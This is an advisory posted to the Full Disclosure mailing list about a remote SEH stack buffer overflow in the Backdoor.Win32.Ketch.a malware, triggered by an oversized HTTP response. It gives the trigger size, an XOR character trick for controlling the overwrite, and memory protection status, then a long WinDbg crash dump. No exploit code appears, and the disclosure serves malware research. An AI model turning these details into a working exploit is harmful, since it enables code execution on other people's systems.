
Date: Wed, 13 Jan 2021 23:18:24 -0500
From: malvuln <malvuln13@...il.com>
To: fulldisclosure@...lists.org
Subject: [FD] BACKDOOR.WIN32.KETCH.A / Remote SEH Stack Buffer Overflow

Discovery / credits: malvuln - Malvuln.com (c) 2021
Original source:
https://malvuln.com/advisory/1149c42fd8cf3ca7d00ef55a6337befe.txt
Contact: malvuln13@...il.com
Media: twitter.com/malvuln

Threat: Backdoor.Win32.Ketch.a
Vulnerability: Remote SEH Stack Buffer Overflow
Description: Ketch makes HTTP request to port 80 for a file named
script.dat, upon processing the server response of 1,612 bytes or more
we can trigger SEH buffer overflow.
Our exploit pattern if using "AAAAAAAAA" will get XOR'd with the value
30 and convert it to 71717171 instead of 41414141, so use "q" for
exploit pattern 41414141.

Reason is first it gets converted so uppercase becomes lowercase and
is XOR'd with value 30. The character "A" becomes "q" 71 so it is
difficult to control chars.
Therefore, if we want to see the typical 41414141 exploit pattern use
lowercase "q" character. Then when 71 (q) gets XOR with 30 it will
become 41 (A).

Type: PE32
MD5: 1149c42fd8cf3ca7d00ef55a6337befe
Vuln ID: MVID-2021-0025
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/13/2021

Memory Dump:
This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(248.1890): Stack overflow - code c00000fd (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=000a3850 edi=000a3d14
eip=773ce916 esp=000a3798 ebp=000a3838 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
ntdll!ZwQueryInformationProcess+0x26:
773ce916 c21400          ret     14h
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for
Backdoor.Win32.Ketch.a.1149c42fd8cf3ca7d00ef55a6337befe.exe
*** ERROR: Module load completed but symbols could not be loaded for
Backdoor.Win32.Ketch.a.1149c42fd8cf3ca7d00ef55a6337befe.exe

FAULTING_IP:
Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe+4689
00404689 8802            mov     byte ptr [edx],al

EXCEPTION_RECORD:  0019f310 -- (.exr 0x19f310)
ExceptionAddress: 00404689
(Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe+0x00004689)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 001a0000
Attempt to write to address 001a0000

PROCESS_NAME:  Backdoor.Win32.Ketch.a.1149c42fd8cf3ca7d00ef55a6337befe.exe

ERROR_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack
cannot be created.

EXCEPTION_CODE: (NTSTATUS) 0xc00000fd - A new guard page for the stack
cannot be created.

EXCEPTION_PARAMETER1:  00000001

EXCEPTION_PARAMETER2:  000a2fe8

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAILED_INSTRUCTION_ADDRESS:
+4689
41414141 ??              ???

CONTEXT:  0019f360 -- (.cxr 0x19f360)
eax=00000041 ebx=028b1dac ecx=028b4281 edx=001a0000 esi=0000064f edi=028b3ca0
eip=00404689 esp=0019f7c0 ebp=0019f958 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010206
Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe+0x4689:
00404689 8802            mov     byte ptr [edx],al          ds:002b:001a0000=41
Resetting default scope

READ_ADDRESS:  41414141

FOLLOWUP_IP:
Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe+4689
00404689 8802            mov     byte ptr [edx],al

WRITE_ADDRESS:  001a0000

LAST_CONTROL_TRANSFER:  from 028b2ff0 to 00404689

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_FILL_PATTERN_41414141

IP_ON_HEAP:  028b2ff0
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

FRAME_ONE_INVALID: 1

STACK_TEXT:
0019f7c0 00404689 backdoor_win32_ketch_a+0x4689
0019f960 028b2ff0 unknown!unknown+0x0
0019f96c 773a2abf ntdll!RtlpAllocateHeap+0xcf
0019fb38 41414141 unknown!printable+0x0
0019fb4c 41414141 unknown!printable+0x0
0019fb50 41414141 unknown!printable+0x0
0019fb54 41414141 unknown!printable+0x0
0019fb58 41414141 unknown!printable+0x0
0019fb5c 41414141 unknown!printable+0x0
0019fb60 41414141 unknown!printable+0x0
0019fb64 41414141 unknown!printable+0x0
0019fb68 41414141 unknown!printable+0x0
0019fb6c 41414141 unknown!printable+0x0
0019fb70 41414141 unknown!printable+0x0
0019fb74 41414141 unknown!printable+0x0
0019fb78 41414141 unknown!printable+0x0
0019fb7c 41414141 unknown!printable+0x0
0019fb80 41414141 unknown!printable+0x0
0019fb84 41414141 unknown!printable+0x0
0019fb88 41414141 unknown!printable+0x0
0019fb8c 41414141 unknown!printable+0x0
0019fb90 41414141 unknown!printable+0x0
0019fb94 41414141 unknown!printable+0x0
0019fb98 41414141 unknown!printable+0x0
0019fb9c 41414141 unknown!printable+0x0
0019fba0 41414141 unknown!printable+0x0
0019fba4 41414141 unknown!printable+0x0
0019fba8 41414141 unknown!printable+0x0
0019fbac 41414141 unknown!printable+0x0
0019fbb0 41414141 unknown!printable+0x0
0019fbb4 41414141 unknown!printable+0x0
0019fbb8 41414141 unknown!printable+0x0
0019fbbc 41414141 unknown!printable+0x0
0019fbc0 41414141 unknown!printable+0x0
0019fbc4 41414141 unknown!printable+0x0
0019fbc8 41414141 unknown!printable+0x0
0019fbcc 41414141 unknown!printable+0x0
0019fbd0 41414141 unknown!printable+0x0
0019fbd4 41414141 unknown!printable+0x0
0019fbd8 41414141 unknown!printable+0x0
0019fbdc 41414141 unknown!printable+0x0
0019fbe0 41414141 unknown!printable+0x0
0019fbe4 41414141 unknown!printable+0x0
0019fbe8 41414141 unknown!printable+0x0
0019fbec 41414141 unknown!printable+0x0
0019fbf0 41414141 unknown!printable+0x0
0019fbf4 41414141 unknown!printable+0x0
0019fbf8 41414141 unknown!printable+0x0
0019fbfc 41414141 unknown!printable+0x0
0019fc00 41414141 unknown!printable+0x0
0019fc04 41414141 unknown!printable+0x0
0019fc08 41414141 unknown!printable+0x0
0019fc0c 41414141 unknown!printable+0x0
0019fc10 41414141 unknown!printable+0x0
0019fc14 41414141 unknown!printable+0x0
0019fc18 41414141 unknown!printable+0x0
0019fc1c 41414141 unknown!printable+0x0
0019fc20 41414141 unknown!printable+0x0
0019fc24 41414141 unknown!printable+0x0
0019fc28 41414141 unknown!printable+0x0
0019fc2c 41414141 unknown!printable+0x0
0019fc30 41414141 unknown!printable+0x0
0019fc34 41414141 unknown!printable+0x0
0019fc38 41414141 unknown!printable+0x0
0019fc3c 41414141 unknown!printable+0x0
0019fc40 41414141 unknown!printable+0x0
0019fc44 41414141 unknown!printable+0x0
0019fc48 41414141 unknown!printable+0x0
0019fc4c 41414141 unknown!printable+0x0
0019fc50 41414141 unknown!printable+0x0
0019fc54 41414141 unknown!printable+0x0
0019fc58 41414141 unknown!printable+0x0
0019fc5c 41414141 unknown!printable+0x0
0019fc60 41414141 unknown!printable+0x0
0019fc64 41414141 unknown!printable+0x0
0019fc68 41414141 unknown!printable+0x0
0019fc6c 41414141 unknown!printable+0x0
0019fc70 41414141 unknown!printable+0x0
0019fc74 41414141 unknown!printable+0x0
0019fc78 41414141 unknown!printable+0x0
0019fc7c 41414141 unknown!printable+0x0
0019fc80 41414141 unknown!printable+0x0
0019fc84 41414141 unknown!printable+0x0
0019fc88 41414141 unknown!printable+0x0
0019fc8c 41414141 unknown!printable+0x0
0019fc90 41414141 unknown!printable+0x0
0019fc94 41414141 unknown!printable+0x0
0019fc98 41414141 unknown!printable+0x0
0019fc9c 41414141 unknown!printable+0x0
0019fca0 41414141 unknown!printable+0x0
0019fca4 41414141 unknown!printable+0x0
0019fca8 41414141 unknown!printable+0x0
0019fcac 41414141 unknown!printable+0x0
0019fcb0 41414141 unknown!printable+0x0
0019fcb4 41414141 unknown!printable+0x0
0019fcb8 41414141 unknown!printable+0x0
0019fcbc 41414141 unknown!printable+0x0
0019fcc0 41414141 unknown!printable+0x0
0019fcc4 41414141 unknown!printable+0x0
0019fcc8 41414141 unknown!printable+0x0
0019fccc 41414141 unknown!printable+0x0
0019fcd0 41414141 unknown!printable+0x0
0019fcd4 41414141 unknown!printable+0x0
0019fcd8 41414141 unknown!printable+0x0
0019fcdc 41414141 unknown!printable+0x0
0019fce0 41414141 unknown!printable+0x0
0019fce4 41414141 unknown!printable+0x0
0019fce8 41414141 unknown!printable+0x0
0019fcec 41414141 unknown!printable+0x0
0019fcf0 41414141 unknown!printable+0x0
0019fcf4 41414141 unknown!printable+0x0
0019fcf8 41414141 unknown!printable+0x0
0019fcfc 41414141 unknown!printable+0x0
0019fd00 41414141 unknown!printable+0x0
0019fd04 41414141 unknown!printable+0x0
0019fd08 41414141 unknown!printable+0x0
0019fd0c 41414141 unknown!printable+0x0
0019fd10 41414141 unknown!printable+0x0
0019fd14 41414141 unknown!printable+0x0
0019fd18 41414141 unknown!printable+0x0
0019fd1c 41414141 unknown!printable+0x0
0019fd20 41414141 unknown!printable+0x0
0019fd24 41414141 unknown!printable+0x0
0019fd28 41414141 unknown!printable+0x0
0019fd2c 41414141 unknown!printable+0x0
0019fd30 41414141 unknown!printable+0x0
0019fd34 41414141 unknown!printable+0x0
0019fd38 41414141 unknown!printable+0x0
0019fd3c 41414141 unknown!printable+0x0
0019fd40 41414141 unknown!printable+0x0
0019fd44 41414141 unknown!printable+0x0
0019fd48 41414141 unknown!printable+0x0
0019fd4c 41414141 unknown!printable+0x0
0019fd50 41414141 unknown!printable+0x0
0019fd54 41414141 unknown!printable+0x0
0019fd58 41414141 unknown!printable+0x0
0019fd5c 41414141 unknown!printable+0x0
0019fd60 41414141 unknown!printable+0x0
0019fd64 41414141 unknown!printable+0x0
0019fd68 41414141 unknown!printable+0x0
0019fd6c 41414141 unknown!printable+0x0
0019fd70 41414141 unknown!printable+0x0
0019fd74 41414141 unknown!printable+0x0
0019fd78 41414141 unknown!printable+0x0
0019fd7c 41414141 unknown!printable+0x0
0019fd80 41414141 unknown!printable+0x0
0019fd84 41414141 unknown!printable+0x0
0019fd88 41414141 unknown!printable+0x0
0019fd8c 41414141 unknown!printable+0x0
0019fd90 41414141 unknown!printable+0x0
0019fd94 41414141 unknown!printable+0x0
0019fd98 41414141 unknown!printable+0x0
0019fd9c 41414141 unknown!printable+0x0
0019fda0 41414141 unknown!printable+0x0
0019fda4 41414141 unknown!printable+0x0
0019fda8 41414141 unknown!printable+0x0
0019fdac 41414141 unknown!printable+0x0
0019fdb0 41414141 unknown!printable+0x0
0019fdb4 41414141 unknown!printable+0x0
0019fdb8 41414141 unknown!printable+0x0
0019fdbc 41414141 unknown!printable+0x0
0019fdc0 41414141 unknown!printable+0x0
0019fdc4 41414141 unknown!printable+0x0
0019fdc8 41414141 unknown!printable+0x0
0019fdcc 41414141 unknown!printable+0x0
0019fdd0 41414141 unknown!printable+0x0
0019fdd4 41414141 unknown!printable+0x0
0019fdd8 41414141 unknown!printable+0x0
0019fddc 41414141 unknown!printable+0x0
0019fde0 41414141 unknown!printable+0x0
0019fde4 41414141 unknown!printable+0x0
0019fde8 41414141 unknown!printable+0x0
0019fdec 41414141 unknown!printable+0x0
0019fdf0 41414141 unknown!printable+0x0
0019fdf4 41414141 unknown!printable+0x0
0019fdf8 41414141 unknown!printable+0x0
0019fdfc 41414141 unknown!printable+0x0
0019fe00 41414141 unknown!printable+0x0
0019fe04 41414141 unknown!printable+0x0
0019fe08 41414141 unknown!printable+0x0
0019fe0c 41414141 unknown!printable+0x0
0019fe10 41414141 unknown!printable+0x0
0019fe14 41414141 unknown!printable+0x0
0019fe18 41414141 unknown!printable+0x0
0019fe1c 41414141 unknown!printable+0x0
0019fe20 41414141 unknown!printable+0x0
0019fe24 41414141 unknown!printable+0x0
0019fe28 41414141 unknown!printable+0x0
0019fe2c 41414141 unknown!printable+0x0
0019fe30 41414141 unknown!printable+0x0
0019fe34 41414141 unknown!printable+0x0
0019fe38 41414141 unknown!printable+0x0
0019fe3c 41414141 unknown!printable+0x0
0019fe40 41414141 unknown!printable+0x0
0019fe44 41414141 unknown!printable+0x0
0019fe48 41414141 unknown!printable+0x0
0019fe4c 41414141 unknown!printable+0x0
0019fe50 41414141 unknown!printable+0x0
0019fe54 41414141 unknown!printable+0x0
0019fe58 41414141 unknown!printable+0x0
0019fe5c 41414141 unknown!printable+0x0
0019fe60 41414141 unknown!printable+0x0
0019fe64 41414141 unknown!printable+0x0
0019fe68 41414141 unknown!printable+0x0
0019fe6c 41414141 unknown!printable+0x0
0019fe70 41414141 unknown!printable+0x0
0019fe74 41414141 unknown!printable+0x0
0019fe78 41414141 unknown!printable+0x0
0019fe7c 41414141 unknown!printable+0x0
0019fe80 41414141 unknown!printable+0x0
0019fe84 41414141 unknown!printable+0x0
0019fe88 41414141 unknown!printable+0x0
0019fe8c 41414141 unknown!printable+0x0
0019fe90 41414141 unknown!printable+0x0
0019fe94 41414141 unknown!printable+0x0
0019fe98 41414141 unknown!printable+0x0
0019fe9c 41414141 unknown!printable+0x0
0019fea0 41414141 unknown!printable+0x0
0019fea4 41414141 unknown!printable+0x0
0019fea8 41414141 unknown!printable+0x0
0019feac 41414141 unknown!printable+0x0
0019feb0 41414141 unknown!printable+0x0
0019feb4 41414141 unknown!printable+0x0
0019feb8 41414141 unknown!printable+0x0
0019febc 41414141 unknown!printable+0x0
0019fec0 41414141 unknown!printable+0x0
0019fec4 41414141 unknown!printable+0x0
0019fec8 41414141 unknown!printable+0x0
0019fecc 41414141 unknown!printable+0x0
0019fed0 41414141 unknown!printable+0x0
0019fed4 41414141 unknown!printable+0x0
0019fed8 41414141 unknown!printable+0x0
0019fedc 41414141 unknown!printable+0x0
0019fee0 41414141 unknown!printable+0x0
0019fee4 41414141 unknown!printable+0x0
0019fee8 41414141 unknown!printable+0x0
0019feec 41414141 unknown!printable+0x0
0019fef0 41414141 unknown!printable+0x0
0019fef4 41414141 unknown!printable+0x0
0019fef8 41414141 unknown!printable+0x0
0019fefc 41414141 unknown!printable+0x0
0019ff00 41414141 unknown!printable+0x0
0019ff04 41414141 unknown!printable+0x0
0019ff08 41414141 unknown!printable+0x0
0019ff0c 41414141 unknown!printable+0x0
0019ff10 41414141 unknown!printable+0x0
0019ff14 41414141 unknown!printable+0x0
0019ff18 41414141 unknown!printable+0x0
0019ff1c 41414141 unknown!printable+0x0
0019ff20 41414141 unknown!printable+0x0
0019ff24 41414141 unknown!printable+0x0
0019ff28 41414141 unknown!printable+0x0
0019ff2c 41414141 unknown!printable+0x0
0019ff30 41414141 unknown!printable+0x0
0019ff34 41414141 unknown!printable+0x0
0019ff38 41414141 unknown!printable+0x0
0019ff3c 41414141 unknown!printable+0x0
0019ff40 41414141 unknown!printable+0x0
0019ff44 41414141 unknown!printable+0x0
0019ff48 41414141 unknown!printable+0x0
0019ff4c 41414141 unknown!printable+0x0
0019ff50 41414141 unknown!printable+0x0
0019ff54 41414141 unknown!printable+0x0
0019ff58 41414141 unknown!printable+0x0
0019ff5c 41414141 unknown!printable+0x0
0019ff60 41414141 unknown!printable+0x0
0019ff64 41414141 unknown!printable+0x0
0019ff68 41414141 unknown!printable+0x0
0019ff6c 41414141 unknown!printable+0x0
0019ff70 41414141 unknown!printable+0x0
0019ff74 41414141 unknown!printable+0x0
0019ff78 41414141 unknown!printable+0x0
0019ff7c 41414141 unknown!printable+0x0
0019ff80 41414141 unknown!printable+0x0
0019ff84 41414141 unknown!printable+0x0
0019ff88 41414141 unknown!printable+0x0
0019ff8c 41414141 unknown!printable+0x0
0019ff90 41414141 unknown!printable+0x0
0019ff94 41414141 unknown!printable+0x0
0019ff98 41414141 unknown!printable+0x0
0019ff9c 41414141 unknown!printable+0x0
0019ffa0 41414141 unknown!printable+0x0
0019ffa4 41414141 unknown!printable+0x0
0019ffa8 41414141 unknown!printable+0x0
0019ffac 41414141 unknown!printable+0x0
0019ffb0 41414141 unknown!printable+0x0
0019ffb4 41414141 unknown!printable+0x0
0019ffb8 41414141 unknown!printable+0x0
0019ffbc 41414141 unknown!printable+0x0
0019ffc0 41414141 unknown!printable+0x0
0019ffc4 41414141 unknown!printable+0x0
0019ffc8 41414141 unknown!printable+0x0
0019ffcc 41414141 unknown!printable+0x0
0019ffd0 41414141 unknown!printable+0x0
0019ffd4 41414141 unknown!printable+0x0
0019ffd8 41414141 unknown!printable+0x0
0019ffdc 41414141 unknown!printable+0x0
0019ffe0 41414141 unknown!printable+0x0
0019ffe4 41414141 unknown!printable+0x0
0019ffe8 41414141 unknown!printable+0x0
0019ffec 41414141 unknown!printable+0x0
0019fff0 41414141 unknown!printable+0x0
0019fff4 41414141 unknown!printable+0x0
0019fff8 41414141 unknown!printable+0x0
0019fffc 41414141 unknown!printable+0x0
001a0000 41414141 unknown!printable+0x0
001a0004 78746341 unknown!

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  backdoor_win32_ketch_a+4689

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Ketch_a_1149c42fd8cf3ca7d00ef55a6337befe

IMAGE_NAME:  Backdoor.Win32.Ketch.a.1149c42fd8cf3ca7d00ef55a6337befe.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  3f7ccf8e

STACK_COMMAND:  .cxr 000000000019F360 ; kb ; dds 19f7c0 ; kb

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ketch_a+4689

FAILURE_BUCKET_ID:
STACK_OVERFLOW_FILL_PATTERN_41414141_c00000fd_Backdoor.Win32.Ketch.a.1149c42fd8cf3ca7d00ef55a6337befe.exe!Unknown

Followup: MachineOwner

0:000> !exchain
000a3764: ntdll!ExecuteHandler2+44 (773e9d70)
000a3d14: ntdll!ExecuteHandler2+44 (773e9d70)
000a42c4: ntdll!ExecuteHandler2+44 (773e9d70)
000a4874: ntdll!ExecuteHandler2+44 (773e9d70)
000a4e24: ntdll!ExecuteHandler2+44 (773e9d70)
000a53d4: ntdll!ExecuteHandler2+44 (773e9d70)
000a5984: ntdll!ExecuteHandler2+44 (773e9d70)
000a5f34: ntdll!ExecuteHandler2+44 (773e9d70)
000a64e4: ntdll!ExecuteHandler2+44 (773e9d70)
000a6a94: ntdll!ExecuteHandler2+44 (773e9d70)
000a7044: ntdll!ExecuteHandler2+44 (773e9d70)
000a75f4: ntdll!ExecuteHandler2+44 (773e9d70)
000a7ba4: ntdll!ExecuteHandler2+44 (773e9d70)
000a8154: ntdll!ExecuteHandler2+44 (773e9d70)
000a8704: ntdll!ExecuteHandler2+44 (773e9d70)
000a8cb4: ntdll!ExecuteHandler2+44 (773e9d70)
000a9264: ntdll!ExecuteHandler2+44 (773e9d70)
000a9814: ntdll!ExecuteHandler2+44 (773e9d70)
000a9dc4: ntdll!ExecuteHandler2+44 (773e9d70)
000aa374: ntdll!ExecuteHandler2+44 (773e9d70)
000aa924: ntdll!ExecuteHandler2+44 (773e9d70)
000aaed4: ntdll!ExecuteHandler2+44 (773e9d70)
000ab484: ntdll!ExecuteHandler2+44 (773e9d70)
000aba34: ntdll!ExecuteHandler2+44 (773e9d70)
000abfe4: ntdll!ExecuteHandler2+44 (773e9d70)
000ac594: ntdll!ExecuteHandler2+44 (773e9d70)
000acb44: ntdll!ExecuteHandler2+44 (773e9d70)
000ad0f4: ntdll!ExecuteHandler2+44 (773e9d70)
000ad6a4: ntdll!ExecuteHandler2+44 (773e9d70)
000adc54: ntdll!ExecuteHandler2+44 (773e9d70)
000ae204: ntdll!ExecuteHandler2+44 (773e9d70)
000ae7b4: ntdll!ExecuteHandler2+44 (773e9d70)
000aed64: ntdll!ExecuteHandler2+44 (773e9d70)
000af314: ntdll!ExecuteHandler2+44 (773e9d70)
000af8c4: ntdll!ExecuteHandler2+44 (773e9d70)
000afe74: ntdll!ExecuteHandler2+44 (773e9d70)
000b0424: ntdll!ExecuteHandler2+44 (773e9d70)
000b09d4: ntdll!ExecuteHandler2+44 (773e9d70)
000b0f84: ntdll!ExecuteHandler2+44 (773e9d70)
000b1534: ntdll!ExecuteHandler2+44 (773e9d70)
000b1ae4: ntdll!ExecuteHandler2+44 (773e9d70)
000b2094: ntdll!ExecuteHandler2+44 (773e9d70)
000b2644: ntdll!ExecuteHandler2+44 (773e9d70)
000b2bf4: ntdll!ExecuteHandler2+44 (773e9d70)
000b31a4: ntdll!ExecuteHandler2+44 (773e9d70)
000b3754: ntdll!ExecuteHandler2+44 (773e9d70)
000b3d04: ntdll!ExecuteHandler2+44 (773e9d70)
000b42b4: ntdll!ExecuteHandler2+44 (773e9d70)
000b4864: ntdll!ExecuteHandler2+44 (773e9d70)
000b4e14: ntdll!ExecuteHandler2+44 (773e9d70)
000b53c4: ntdll!ExecuteHandler2+44 (773e9d70)
000b5974: ntdll!ExecuteHandler2+44 (773e9d70)
000b5f24: ntdll!ExecuteHandler2+44 (773e9d70)
000b64d4: ntdll!ExecuteHandler2+44 (773e9d70)
000b6a84: ntdll!ExecuteHandler2+44 (773e9d70)
000b7034: ntdll!ExecuteHandler2+44 (773e9d70)
000b75e4: ntdll!ExecuteHandler2+44 (773e9d70)
000b7b94: ntdll!ExecuteHandler2+44 (773e9d70)
000b8144: ntdll!ExecuteHandler2+44 (773e9d70)
000b86f4: ntdll!ExecuteHandler2+44 (773e9d70)
000b8ca4: ntdll!ExecuteHandler2+44 (773e9d70)
000b9254: ntdll!ExecuteHandler2+44 (773e9d70)
000b9804: ntdll!ExecuteHandler2+44 (773e9d70)
000b9db4: ntdll!ExecuteHandler2+44 (773e9d70)
000ba364: ntdll!ExecuteHandler2+44 (773e9d70)
000ba914: ntdll!ExecuteHandler2+44 (773e9d70)
000baec4: ntdll!ExecuteHandler2+44 (773e9d70)
000bb474: ntdll!ExecuteHandler2+44 (773e9d70)
000bba24: ntdll!ExecuteHandler2+44 (773e9d70)
000bbfd4: ntdll!ExecuteHandler2+44 (773e9d70)
000bc584: ntdll!ExecuteHandler2+44 (773e9d70)
000bcb34: ntdll!ExecuteHandler2+44 (773e9d70)
000bd0e4: ntdll!ExecuteHandler2+44 (773e9d70)
000bd694: ntdll!ExecuteHandler2+44 (773e9d70)
000bdc44: ntdll!ExecuteHandler2+44 (773e9d70)
000be1f4: ntdll!ExecuteHandler2+44 (773e9d70)
000be7a4: ntdll!ExecuteHandler2+44 (773e9d70)
000bed54: ntdll!ExecuteHandler2+44 (773e9d70)
000bf304: ntdll!ExecuteHandler2+44 (773e9d70)
000bf8b4: ntdll!ExecuteHandler2+44 (773e9d70)
000bfe64: ntdll!ExecuteHandler2+44 (773e9d70)
000c0414: ntdll!ExecuteHandler2+44 (773e9d70)
000c09c4: ntdll!ExecuteHandler2+44 (773e9d70)
000c0f74: ntdll!ExecuteHandler2+44 (773e9d70)
000c1524: ntdll!ExecuteHandler2+44 (773e9d70)
000c1ad4: ntdll!ExecuteHandler2+44 (773e9d70)
000c2084: ntdll!ExecuteHandler2+44 (773e9d70)
000c2634: ntdll!ExecuteHandler2+44 (773e9d70)
000c2be4: ntdll!ExecuteHandler2+44 (773e9d70)
000c3194: ntdll!ExecuteHandler2+44 (773e9d70)
000c3744: ntdll!ExecuteHandler2+44 (773e9d70)
000c3cf4: ntdll!ExecuteHandler2+44 (773e9d70)
000c42a4: ntdll!ExecuteHandler2+44 (773e9d70)
000c4854: ntdll!ExecuteHandler2+44 (773e9d70)
000c4e04: ntdll!ExecuteHandler2+44 (773e9d70)
000c53b4: ntdll!ExecuteHandler2+44 (773e9d70)
000c5964: ntdll!ExecuteHandler2+44 (773e9d70)
000c5f14: ntdll!ExecuteHandler2+44 (773e9d70)
000c64c4: ntdll!ExecuteHandler2+44 (773e9d70)
000c6a74: ntdll!ExecuteHandler2+44 (773e9d70)
000c7024: ntdll!ExecuteHandler2+44 (773e9d70)
000c75d4: ntdll!ExecuteHandler2+44 (773e9d70)
000c7b84: ntdll!ExecuteHandler2+44 (773e9d70)
000c8134: ntdll!ExecuteHandler2+44 (773e9d70)
000c86e4: ntdll!ExecuteHandler2+44 (773e9d70)
000c8c94: ntdll!ExecuteHandler2+44 (773e9d70)
000c9244: ntdll!ExecuteHandler2+44 (773e9d70)
000c97f4: ntdll!ExecuteHandler2+44 (773e9d70)
000c9da4: ntdll!ExecuteHandler2+44 (773e9d70)
000ca354: ntdll!ExecuteHandler2+44 (773e9d70)
000ca904: ntdll!ExecuteHandler2+44 (773e9d70)
000caeb4: ntdll!ExecuteHandler2+44 (773e9d70)
000cb464: ntdll!ExecuteHandler2+44 (773e9d70)
000cba14: ntdll!ExecuteHandler2+44 (773e9d70)
000cbfc4: ntdll!ExecuteHandler2+44 (773e9d70)
000cc574: ntdll!ExecuteHandler2+44 (773e9d70)
000ccb24: ntdll!ExecuteHandler2+44 (773e9d70)
000cd0d4: ntdll!ExecuteHandler2+44 (773e9d70)
000cd684: ntdll!ExecuteHandler2+44 (773e9d70)
000cdc34: ntdll!ExecuteHandler2+44 (773e9d70)
000ce1e4: ntdll!ExecuteHandler2+44 (773e9d70)
000ce794: ntdll!ExecuteHandler2+44 (773e9d70)
000ced44: ntdll!ExecuteHandler2+44 (773e9d70)
000cf2f4: ntdll!ExecuteHandler2+44 (773e9d70)
000cf8a4: ntdll!ExecuteHandler2+44 (773e9d70)
000cfe54: ntdll!ExecuteHandler2+44 (773e9d70)
000d0404: ntdll!ExecuteHandler2+44 (773e9d70)
000d09b4: ntdll!ExecuteHandler2+44 (773e9d70)
000d0f64: ntdll!ExecuteHandler2+44 (773e9d70)
000d1514: ntdll!ExecuteHandler2+44 (773e9d70)
000d1ac4: ntdll!ExecuteHandler2+44 (773e9d70)
000d2074: ntdll!ExecuteHandler2+44 (773e9d70)
000d2624: ntdll!ExecuteHandler2+44 (773e9d70)
000d2bd4: ntdll!ExecuteHandler2+44 (773e9d70)
000d3184: ntdll!ExecuteHandler2+44 (773e9d70)
000d3734: ntdll!ExecuteHandler2+44 (773e9d70)
000d3ce4: ntdll!ExecuteHandler2+44 (773e9d70)
000d4294: ntdll!ExecuteHandler2+44 (773e9d70)
000d4844: ntdll!ExecuteHandler2+44 (773e9d70)
000d4df4: ntdll!ExecuteHandler2+44 (773e9d70)
000d53a4: ntdll!ExecuteHandler2+44 (773e9d70)
000d5954: ntdll!ExecuteHandler2+44 (773e9d70)
000d5f04: ntdll!ExecuteHandler2+44 (773e9d70)
000d64b4: ntdll!ExecuteHandler2+44 (773e9d70)
000d6a64: ntdll!ExecuteHandler2+44 (773e9d70)
000d7014: ntdll!ExecuteHandler2+44 (773e9d70)
000d75c4: ntdll!ExecuteHandler2+44 (773e9d70)
000d7b74: ntdll!ExecuteHandler2+44 (773e9d70)
000d8124: ntdll!ExecuteHandler2+44 (773e9d70)
000d86d4: ntdll!ExecuteHandler2+44 (773e9d70)
000d8c84: ntdll!ExecuteHandler2+44 (773e9d70)
000d9234: ntdll!ExecuteHandler2+44 (773e9d70)
000d97e4: ntdll!ExecuteHandler2+44 (773e9d70)
000d9d94: ntdll!ExecuteHandler2+44 (773e9d70)
000da344: ntdll!ExecuteHandler2+44 (773e9d70)
000da8f4: ntdll!ExecuteHandler2+44 (773e9d70)
000daea4: ntdll!ExecuteHandler2+44 (773e9d70)
000db454: ntdll!ExecuteHandler2+44 (773e9d70)
000dba04: ntdll!ExecuteHandler2+44 (773e9d70)
000dbfb4: ntdll!ExecuteHandler2+44 (773e9d70)
000dc564: ntdll!ExecuteHandler2+44 (773e9d70)
000dcb14: ntdll!ExecuteHandler2+44 (773e9d70)
000dd0c4: ntdll!ExecuteHandler2+44 (773e9d70)
000dd674: ntdll!ExecuteHandler2+44 (773e9d70)
000ddc24: ntdll!ExecuteHandler2+44 (773e9d70)
000de1d4: ntdll!ExecuteHandler2+44 (773e9d70)
000de784: ntdll!ExecuteHandler2+44 (773e9d70)
000ded34: ntdll!ExecuteHandler2+44 (773e9d70)
000df2e4: ntdll!ExecuteHandler2+44 (773e9d70)
000df894: ntdll!ExecuteHandler2+44 (773e9d70)
000dfe44: ntdll!ExecuteHandler2+44 (773e9d70)
000e03f4: ntdll!ExecuteHandler2+44 (773e9d70)
000e09a4: ntdll!ExecuteHandler2+44 (773e9d70)
000e0f54: ntdll!ExecuteHandler2+44 (773e9d70)
000e1504: ntdll!ExecuteHandler2+44 (773e9d70)
000e1ab4: ntdll!ExecuteHandler2+44 (773e9d70)
000e2064: ntdll!ExecuteHandler2+44 (773e9d70)
000e2614: ntdll!ExecuteHandler2+44 (773e9d70)
000e2bc4: ntdll!ExecuteHandler2+44 (773e9d70)
000e3174: ntdll!ExecuteHandler2+44 (773e9d70)
000e3724: ntdll!ExecuteHandler2+44 (773e9d70)
000e3cd4: ntdll!ExecuteHandler2+44 (773e9d70)
000e4284: ntdll!ExecuteHandler2+44 (773e9d70)
000e4834: ntdll!ExecuteHandler2+44 (773e9d70)
000e4de4: ntdll!ExecuteHandler2+44 (773e9d70)
